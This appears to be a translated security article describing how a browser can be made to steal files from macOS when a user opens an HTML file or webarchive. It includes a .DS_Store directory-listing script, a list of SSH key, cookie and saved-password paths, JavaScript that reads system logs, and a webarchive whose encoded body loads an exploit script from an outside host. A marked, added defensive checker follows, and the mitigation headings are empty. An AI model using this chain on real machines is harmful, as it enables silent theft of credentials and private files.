How can files be stolen from macOS with a simple web page file?
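Documents, source code, SSH keys, passwords: all of these files can be sent off the machine. Impossible? Of course it is possible. Some commonly used browsers may be doing exactly this.
1. The user opens an HTML file in the browser.
2. The browser reads the list of files the user has permission to access.
3. The browser reads important files and uploads them to a remote server started by the attacker. This happens in the background, and the user is not notified.
Stage one: collect information about the files on the current user's computer.
Stage two: read the files and upload them to the remote server.
Getting the directory listing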
#!/usr/bin/env python
from ds_store import DSStore
import json

# Home directory of the user; USERNAME is a placeholder.
base = '/Users/USERNAME/'

def parse(store):
    # Collect the unique file names recorded in a .DS_Store file.
    filelist = []
    for entry in store:
        if entry.filename != '.':
            filelist.append(entry.filename)
    return list(set(filelist))

d = DSStore.open(base + '.DS_Store', 'r+')
fileresult = parse(d)
print(json.dumps(fileresult))

all_results = []
for name in fileresult:
    try:
        d = DSStore.open(base + name + '/.DS_Store', 'r+')
        subresult = parse(d)
        all_results.append(subresult)
        print(json.dumps(subresult))
    except Exception:
        # This subdirectory has no readable .DS_Store file.
        pass
$ python parse_ds_store.py
["Documents", "Pictures", ".idm", "Desktop", "Music", ".oracle_jre_usage", "Public", "tmp", "Parallels", "MEGA", ".BurpSuite", "Downloads", ".config", ".cache", "Applications", ".bash_sessions", "Creative Cloud Files", "PycharmProjects", "Applications (Parallels)", "Dropbox", "Nextcloud", ".iterm2", ".Trash", "Scripts", "Movies", "MEGAsync Downloads", "Soft", ".local", ".ssh", "Library", ".pgadmin"]
["Backups","Soft","Pictures",".ssh"...]
["2017", "2016", "2015", …]
["source", "sql", "static", …]
Predicting the paths of files that hold valuable information
~/.ssh/id_rsa
~/.ssh/id_rsa.key
~/.ssh/id_rsa.pub
~/.ssh/known_hosts
~/.ssh/authorized_keys
~/Library/Cookies/Cookies.binarycookies
~/Library/Cookies/com.apple.Safari.cookies
~/Library/Cookies/HSTS.plist
~/Library/Accounts/Accounts4.sqlite
~/Library/Application Support/
~/Library/Application Support/Google/Chrome/Default/Login Data
~/Library/Application Support/Google/Chrome/Default/Cookies
~/Library/Application Support/Google/Chrome/Default/History
Silently accessing the user's files
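function getUser() {
    var xhr = new XMLHttpRequest();
    try {
        // Synchronous request for the system log; the first /Users/<name>/ path in it gives the user name.
        xhr.open('GET', '/var/log/system.log;/https:%2f%2fgoogle.com/', false);
        xhr.send();
        return xhr.responseText.match(/\/Users\/\w+\//g)[0];
    } catch (e) {
        // Fall back to the install log if the system log gave no match.
        xhr.open('GET', '/var/log/install.log;/https:%2f%2fgoogle.com/', false);
        xhr.send();
        return xhr.responseText.match(/\/Users\/\w+\//g)[0];
    }
}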
Getting the files
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>WebMainResource</key>
    <dict>
        <key>WebResourceData</key>
        <data>
        PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQgc3JjPSdodHRwczo
        vL2JvMG9tLnJ1L3NhZmFyaV9wb2MvcmVhZGZpbGUuanMnPjwvc2NyaXB0Pj
        wvYm9keT48L2h0bWw+
        </data>
        <key>WebResourceFrameName</key>
        <string></string>
        <key>WebResourceMIMEType</key>
        <string>text/html</string>
        <key>WebResourceTextEncodingName</key>
        <string>UTF-8</string>
        <key>WebResourceURL</key>
        <string>file:///</string>
    </dict>
</dict>
</plist>
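A defender's check for the archive format shown above, as an added example that is not part of the original article: it parses a .webarchive property list and reports a main resource that declares a file:// URL or pulls in a remote script. The function names, the heuristic itself and the embedded sample archives are assumptions constructed for illustration.

```python
import plistlib
import re
from urllib.parse import urlparse

# Matches <script src=...> pointing at an http(s) or protocol-relative URL.
REMOTE_SCRIPT = re.compile(
    rb"""<script[^>]*\bsrc\s*=\s*["']?((?:https?:)?//[^"'\s>]+)""", re.I)

def audit_webarchive(raw: bytes) -> list:
    """Return findings for one .webarchive (XML or binary plist) given as bytes."""
    try:
        archive = plistlib.loads(raw)
    except Exception:
        return ["not a parseable property list"]
    main = archive.get("WebMainResource") if isinstance(archive, dict) else None
    if not isinstance(main, dict):
        return ["no WebMainResource dictionary"]
    findings = []
    url = main.get("WebResourceURL", "")
    body = main.get("WebResourceData", b"")
    # A saved page normally records the http(s) URL it was fetched from.
    if isinstance(url, str) and urlparse(url).scheme.lower() == "file":
        findings.append("main resource claims a local origin: " + url)
    if isinstance(body, bytes):
        for m in REMOTE_SCRIPT.finditer(body):
            findings.append("loads remote script: " + m.group(1).decode("ascii", "replace"))
    return findings

def build_sample(url: str, html: bytes) -> bytes:
    # Constructed test input with the same keys as the plist shown above.
    return plistlib.dumps({"WebMainResource": {
        "WebResourceData": html,
        "WebResourceFrameName": "",
        "WebResourceMIMEType": "text/html",
        "WebResourceTextEncodingName": "UTF-8",
        "WebResourceURL": url,
    }})

SUSPICIOUS = build_sample(
    "file:///", b"<html><body><script src='https://example.invalid/a.js'></script></body></html>")
ORDINARY = build_sample(
    "https://example.invalid/page", b"<html><body><p>hello</p></body></html>")

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS), ("ordinary", ORDINARY)):
        print(label, audit_webarchive(sample))
```

The same function can be run over the bytes of archives arriving as mail attachments or downloads before they are opened in a browser.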
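How is the data origin problem solved?
What should be done?
Original publication date: August 7, 2017
Author: xnianq
This article comes from 嘶吼, a partner of 云栖社区; for related information, follow the 嘶吼 website.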